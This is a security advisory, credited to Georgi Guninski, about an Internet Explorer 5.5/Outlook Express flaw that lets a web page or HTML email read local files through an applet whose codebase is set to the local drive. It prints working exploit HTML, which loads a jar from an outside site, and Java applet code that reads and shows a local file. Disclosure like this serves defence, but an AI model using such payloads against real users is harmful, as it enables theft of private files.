|
|
| |
| There is a security vulnerability in IE 5.5/Outlook/Outlook Express, which allows reading of local files, arbitrary Intranet URLs and local directory structure after viewing a web page or reading a malicious HTML message. |
| |
Credit:
The information has been provided by Georgi Guninski.
|
| |
The lies in the ability of specifying arbitrary codebase for an applet loaded from <OBJECT> tag and a jar file. Applets may read URLs from their codebase and communicate with hosts from the same codebase.
The following code:
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
Sets the applet's codebase to file:///c:/. This is not a Java language problem and supposedly not a problem in Microsoft's VM but rather a problem in the way codebase is set by IE.
Exploit:
The code is:
---------javacodebase1.html------------------------------------------
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
---------------------------------------------------------------------
--------gjavacodebase.java-------------------------------------------
......
try
{
u = new URL(getParameter("URL"));
InputStream is=u.openStream();
byte ba[]=new byte[1000];
int l=is.read(ba);
InputStream os=u.openConnection().getInputStream();
String s1=new String(ba,0,l);
print(u.toString());
print(s1);
}
.......
---------------------------------------------------------------------
Workaround:
Disable Java.
Demonstration:
A live demonstration is available at: http://www.guninski.com/javacodebase1.html
|
|
|
|
|
